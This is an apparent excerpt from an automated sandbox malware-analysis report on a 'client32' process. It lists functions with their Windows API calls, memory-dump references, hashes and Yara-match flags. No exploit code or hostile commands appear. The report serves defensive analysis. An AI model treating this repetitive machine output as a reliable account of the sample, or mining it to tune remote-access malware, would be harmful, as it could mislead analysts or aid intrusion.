                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 68818B80
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog3$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateCurrentErrorEventExceptionLastThreadThrow_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1790702778-0
                                                                                                                                                                                                    • Opcode ID: 8b21dda331f95becd7b52e705f391635d2186951b87c33940618e4d829769485
                                                                                                                                                                                                    • Instruction ID: 167e22655ff0219513fe8d0d44cac03e5127d81dd88becb7b878f69b1dc387e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b21dda331f95becd7b52e705f391635d2186951b87c33940618e4d829769485
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 742193F494424BAFD7009F758888AAEBFA4FF09314BD08979E5A9D7200CB34D955DFA0
                                                                                                                                                                                                    Function 1100B290 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1100B2A0
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1100B2D9
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1100B2F8
                                                                                                                                                                                                      • Part of subcall function 1100A200: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100A21E
                                                                                                                                                                                                      • Part of subcall function 1100A200: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A248
                                                                                                                                                                                                      • Part of subcall function 1100A200: GetLastError.KERNEL32 ref: 1100A250
                                                                                                                                                                                                      • Part of subcall function 1100A200: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A264
                                                                                                                                                                                                      • Part of subcall function 1100A200: CloseHandle.KERNEL32(00000000), ref: 1100A26B
                                                                                                                                                                                                    • waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B308
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B30F
                                                                                                                                                                                                    • _free.LIBCMT ref: 1100B318
                                                                                                                                                                                                    • _free.LIBCMT ref: 1100B31E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 705253285-0
                                                                                                                                                                                                    • Opcode ID: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
                                                                                                                                                                                                    • Instruction ID: ec5bb7023ba9694b1826725806baee6a54caa52fbc33dd5691a93a0cc33b1c6d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C111C27A900B16ABE311CF60CC88BEFB7ECAF48358F004919FA2692141D370B540CB61
                                                                                                                                                                                                    Function 110CB5D0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000475), ref: 110CB5E0
                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 110CB5E7
                                                                                                                                                                                                    • GetDlgItemTextA.USER32(?,00000475,00000000,00000001), ref: 110CB605
                                                                                                                                                                                                    • _free.LIBCMT ref: 110CB617
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 110CB635
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110CB630
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorItemLastText$ExitFreeHeapLengthMessageProcessWindow_freewsprintf
                                                                                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                                    • API String ID: 251526942-3415836059
                                                                                                                                                                                                    • Opcode ID: 99e580d3e1833fc068e3b290c8354ea38fc1aa46638c1302fc5de43aa3fb4a75
                                                                                                                                                                                                    • Instruction ID: 0eb6a058222da800fe12992da5caab4c5bd0fe2efc99a90d0edb73e055c5ac9e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99e580d3e1833fc068e3b290c8354ea38fc1aa46638c1302fc5de43aa3fb4a75
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA01AD7AA00517BBD740DB99DC88D9FF3ADEF892583148120FA2887200DB34F9158BE2
                                                                                                                                                                                                    Function 6883A988 Relevance: 10.5, APIs: 7, Instructions: 47COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6883A993
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6883A99E
                                                                                                                                                                                                      • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
                                                                                                                                                                                                    • __wsopen_s.LIBCMT(00000000,00000000,00008002,00000040,00000000), ref: 6883A9B8
                                                                                                                                                                                                    • __futime64.LIBCMT(00000000,?), ref: 6883A9CC
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6883A9DA
                                                                                                                                                                                                    • _close.MSVCR100(00000000), ref: 6883A9E9
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6883A9F4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__futime64__wsopen_s_close_invalid_parameter_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 503974632-0
                                                                                                                                                                                                    • Opcode ID: 98dfde91b35ce29ae28cc6a0999241e032e96967552797d283f678174d732f76
                                                                                                                                                                                                    • Instruction ID: bf0f45bdb1e742a7bb3dcf1ca2b86ae2cf3b8eab06f843807cabc1a490d03590
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98dfde91b35ce29ae28cc6a0999241e032e96967552797d283f678174d732f76
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E01A236504528EBDF001FA9DC49B993B659F80778F928612FA387B1D0DB31995187E1
                                                                                                                                                                                                    Function 1101D350 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1101D35E
                                                                                                                                                                                                    • LoadIconA.USER32(00000000,0000139A), ref: 1101D3AF
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1101D3BF
                                                                                                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 1101D3E1
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1101D3E7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 430917334-4108050209
                                                                                                                                                                                                    • Opcode ID: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
                                                                                                                                                                                                    • Instruction ID: 2890e39c8948161dcf3a4c2706354c0f925fee5346d150246dd1548a136c71b7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0018074D0131AABDB00EFE0C859B9DFBB4AB04308F508529F614BA284E7B511048B96
                                                                                                                                                                                                    Function 68818BD4 Relevance: 10.5, APIs: 7, Instructions: 38threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818BF0
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 68818BF3
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,68820AE8,?,?,?,00000000), ref: 68818BFA
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,68820AE8,?,?,?,00000000), ref: 68818BFD
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,68820AE8,?,?,?,00000000), ref: 68818C07
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,68820AE8,?,?,?,00000000), ref: 68818C1F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(68880C48,68880C48,00000000,?,68820AE8,?,?,?,00000000), ref: 68818C2D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Current$Process$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorExceptionHandleLastThreadThrow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2881127307-0
                                                                                                                                                                                                    • Opcode ID: ee76d90a30474edde0f8b451ae53152faae136c9eb5c10c7fc1d30a0d93dc560
                                                                                                                                                                                                    • Instruction ID: 1326c2708b90d019255591ef35377a754f8389a5028402e9220dc937b1b9037e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee76d90a30474edde0f8b451ae53152faae136c9eb5c10c7fc1d30a0d93dc560
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45F09072980216A7CB10ABB58C0EFEF7B6CBF06740F804925B151D3080DF34E401CBA0
                                                                                                                                                                                                    Function 6882E946 Relevance: 10.5, APIs: 7, Instructions: 35COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR100 ref: 6882E951
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6882E959
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6882E964
                                                                                                                                                                                                      • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 6882E971
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6882E97C
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6882E983
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 6882E99D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile$ErrorLast__doserrno__dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 567378056-0
                                                                                                                                                                                                    • Opcode ID: e9b1b398537aab9109600170e59bece55f63aaa0f85d32b52625b41e7cfb4c71
                                                                                                                                                                                                    • Instruction ID: c283b0f597a8b5eadf1e1b926b36e538d037b7e392f49f39d97634bb7c2ece19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9b1b398537aab9109600170e59bece55f63aaa0f85d32b52625b41e7cfb4c71
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDF03071414648EFDB506BF4D91C36D7B64BF02376F944A16F438954E1CB30C88097B5
                                                                                                                                                                                                    Function 11003340 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EFD), ref: 1100334D
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11003373
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110033A2
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                                                                                                    • Instruction ID: 58cfccb6135285d2752e7502dd052a47240bf2dd06342519f2e5277968a08211
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79F05C3EF0062663C22352263C49F4FB7684BC1AB8F110071F910FA744FE11A00041FA
                                                                                                                                                                                                    Function 11003430 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EF1), ref: 1100343D
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11003463
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003492
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
